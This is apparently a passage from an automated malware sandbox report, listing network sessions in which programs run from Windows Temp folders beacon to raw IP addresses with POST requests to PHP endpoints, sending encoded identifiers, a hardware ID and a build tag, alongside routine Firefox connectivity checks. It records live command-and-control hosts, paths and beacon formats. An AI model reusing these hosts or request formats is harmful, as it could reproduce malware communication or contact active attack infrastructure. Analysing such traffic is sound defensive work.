Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:21.410423040 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:22.193150997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:22.253303051 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:22.509727955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49803	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:21.713726044 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:22.454665899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:22.525111914 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:22.794728041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49805	34.107.221.82	80	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:22.301415920 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 26, 2024 20:10:22.789201021 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 25 Jul 2024 18:28:59 GMT Age: 85283 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 26, 2024 20:10:32.868710041 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 26, 2024 20:10:34.288232088 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 26, 2024 20:10:34.571870089 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 25 Jul 2024 18:28:59 GMT Age: 85295 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 26, 2024 20:10:34.611138105 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 25 Jul 2024 18:28:59 GMT Age: 85295 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jul 26, 2024 20:10:35.309192896 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Jul 26, 2024 20:10:35.411945105 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 25 Jul 2024 18:28:59 GMT Age: 85296 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49808	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:22.719290972 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:23.464101076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:23.468588114 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:23.715607882 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49811	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:23.100641012 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:23.863874912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:23.875782967 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:24.123631954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49814	85.28.47.31	80	7884	C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:23.624094963 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 20:10:24.278872013 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 20:10:24.312931061 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 37 34 41 30 33 30 46 43 42 46 31 30 37 39 32 30 39 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"0374A030FCBF1079209047------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"sila------DGDBKFBAKFBFHIECFBFI--
Jul 26, 2024 20:10:24.507849932 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49818	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:23.860918045 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:24.668153048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:24.669676065 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:24.920459986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49819	34.107.221.82	80	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:24.026274920 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 26, 2024 20:10:24.496942043 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 25 Jul 2024 18:23:15 GMT Age: 85629 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 26, 2024 20:10:34.682066917 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 26, 2024 20:10:34.773857117 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 26, 2024 20:10:34.871778011 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 25 Jul 2024 18:23:15 GMT Age: 85639 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Jul 26, 2024 20:10:35.623640060 CEST	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Jul 26, 2024 20:10:35.720201969 CEST	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 25 Jul 2024 18:23:15 GMT Age: 85640 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49824	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:24.236967087 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:24.983717918 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:24.985650063 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:25.236949921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	64044	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:25.044294119 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:25.847513914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:25.863409042 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:26.108587027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	64046	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:25.380517960 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:26.414710999 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:26.416914940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:26.439821959 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:26.692629099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	64053	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:26.439507008 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:27.173582077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
